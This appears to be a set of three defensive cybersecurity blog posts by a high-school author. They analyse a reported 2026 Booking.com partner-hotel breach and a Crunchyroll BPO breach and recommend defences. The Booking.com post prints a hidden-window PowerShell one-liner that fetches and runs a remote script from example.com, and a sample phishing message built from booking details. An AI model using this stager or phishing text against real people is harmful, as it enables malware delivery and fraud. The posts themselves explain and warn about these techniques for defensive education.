Forem: Bulut Caner

Booking.com Got Breached. Your Reservation Was the Weapon.

Bulut Caner — Mon, 20 Apr 2026 11:05:18 +0000

In april 13th 2026, online travel agency booking.com issued a major notification that echoed back to 2021. There was unauthorized access to customer PII(Personally Identifiable Information). After the breach, their Public Relations team immediately stated that financial information was not accessed by the threat actors.

The breach most likely did not hit Booking.com’s core servers, but in fact it hit their Supply Chain. The supply chain in this case, refers to the network of partner hotels with a connection to Booking.com. If the hackers can’t or choose not to hack the “big bank” they choose to go to its local branches. The threat actos likely used a tactic called ClickFix where they might have tricked the hotel staff into running a malicious script under the guise of “fixing” a browser error that later on steals their session cookies.Session cookies are the digital ID within your browser that has the function of keeping you logged in. When a hacker steals this, they automatically bypass the need for password and Multi-Factor Authentication completely. To know how malware gets into a system we need to look at a stager. A stager is a small piece of code and its job is to download a malicious payload. The stager is like a delivery tool, for the harmful code. The malware is thus the harmful code that the stager downloads.

Disclaimer: The following code is purely for representation and provided with the intention of educational display.

# CONCEPTUAL REPRESENTATION ONLY — educational purposes
# Modern EDR/AMSI solutions would flag and block this immediately.

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"
-ExecutionPolicy Bypass: Tells the system to ignore local script restrictions.

iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.
Although only non-financial data was breached, it is still dangerous and is a major threat. Attackers can take the stolen PII and use it to make up a lie that can seem impossible to ignore. Because the threat actor knows your check in date, hotel name and more information about the registration, you believe the message is actually real.


{
  "guest_name": "Jane Smith",
  "booking_ref": "BK-99210",
  "check_in": "2026-05-14",
  "hotel_name": "Seaside Resort"
}

The message can look something like this: “Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”

Booking.com had a similar breach to this back in 2021 and it was fined €475,000 under The General Data Protection Regulation. Which is a European law which can hit many companies with massive fines if they manage to lose customer/user data.

You do not have to be a tech giant such as Booking.com to be taken as a target. Small businesses are often and have been used in the past as a bridge to leap over to bigger targets or their customer’s wallets. As you could see, this breach was not considered to be high tech but more of a simple one. The humans were the ones exploited along with the companies data systems. The manner to tackle such session hijacking and supply chain vulnerabilities can consist of many measures. First of all you can ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s “Trusted Platform Module” When an attacker tries to exfiltrate the cookie to another machine, the session becomes invalid, so the private key never leaves the original set hardware. Another good measure could be enabling PowerShell Constrained Language Mode where you block -ExecutionPolicy Bypass flag for non admin users.

A good take from this breach could be, if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must begin also when everything is silent.

When Third Party Support Becomes Your Weakest Point: April 2026 Security Breach

Bulut Caner — Thu, 16 Apr 2026 12:56:14 +0000

On March 12 2026 threat actors got into Crunchyrolls support system by putting malware on a Telus International support agents computer. Stole their login details. With one login they could get into many internal systems like Zendesk, Gmail, Slack and Jira.
The attackers main goal was Crunchyrolls support system, Zendesk. This software helps manage customer requests in one place. Within 24 hours they downloaded 8 million support tickets. These tickets contained information such as customer names, emails, IP addresses and locations.

The attackers demanded $5 million. When Crunchyroll didn’t pay they leaked the data on April 4. Companies that do work for others like BPOs are major targets. If one employees computer gets compromised the bad actors can get into companies at once. Crunchyroll’s systems lacked basic defenses such as no API rate limiting, no anomaly detection but also no real-time monitoring. What would save or somewhat made this breach less worse, would be blocking bulk downloads, flag unusual access patterns, hardware multi factor authentication as well as network segmentation. This is not new either. Discord, Marks & Spencer, Co-op, and others have been hit the same way. Therefore until companies audit BPO permissions and implement zero-trust controls, expect more breaches.

There was probably no reason for a support agent to have full access to Jira, Slack, Gmail and Zendesk at the same time. This suggests that the company failed to control who had access to what giving agents access than they needed for their job. Beyond password theft the hackers likely used malware to steal session cookies. These cookies let attackers pretend to be logged in bypassing -factor authentication. The damage goes beyond the initial $5 million ransom demand. With eight million tickets leaked the risk now is that attackers will use this information to send emails to trick users into giving away credit card details or login credentials. For the company that was breached the fallout is huge showing a failure in endpoint security that allowed malware to persist undetected.

To prevent these kinds of attacks companies need to change how they think about security. They need to move from trusting vendors and toward a Zero Trust system. This starts with giving access to the specific application needed for a task. If an agent is working in Zendesk they should not be able to see the Jira login page. Companies should also require hardware-based -factor authentication, like physical security keys. These devices are much harder to hack than SMS or app-based codes. Data loss prevention must also be reinforced with API rate limiting and behavioral monitoring. The fact that millions of tickets were downloaded within a single day points to a lack of checks in the system. Security protocols should limit the number of records a single user can pull in a timeframe.
For sensitive roles companies can eliminate the risk of local device compromise by using Virtual Desktop Infrastructure (VDI) or managed enterprise browsers. In a VDI environment the agent logs into a machine managed by the parent company ensuring that no data lives on the agent’s hardware.
Finally security must be treated as an contractual obligation, not just a technical one. Organizations must implement third-party audits and “right-to-audit” clauses that allow for unannounced security scans of a vendor’s endpoint hygiene. Service Level Agreements should include financial penalties if a breach results from a vendor’s failure to maintain basic defenses. By treating BPO employees as high-risk users and wrapping their access, in these layers of friction companies can prioritize data safety.

Why a High School Student is Covering Defensive Cybersecurity

Bulut Caner — Thu, 16 Apr 2026 12:47:19 +0000

I’m 16. I recently started discovering cybersecurity purely out of curiosity. To see what it’s like, protecting yourself and others from cybercriminals before it becomes a bigger problem within society. As I delved deeper into this field the more I saw that I needed to learn more, to fully comprehend how computers communicate, before understanding how they’re exploited.

About me: In two years I would like to study cybersecurity & cybercrime at a university. This newsletter will be me documenting multiple aspects of cybersecurity to document how breaches happen globally and what we can learn from them. Many angles will be discovered such as defensive security analysis, the attack prevention measures of organizations, what went wrong and how it could possibly have been prevented. I am currently the Head of Technics of our MUN organization, where I built and deployed a website from scratch. Within the process I learned web design, web development and DNS configuration of our custom domain.

Defense Stack, The Security Analysis Newsletter by a highschool student: The first posts will break down recent cybersecurity breaches, what happened, how attackers got in, as well as what defensive measures could help stopping it. If you’re curious about cybersecurity, learning alongside me, or just want to understand what’s happening in the digital threat landscape, you may want to join me. This will be a long journey and I am going to extract as much information as I can.

— First Publication of Defense Stack >_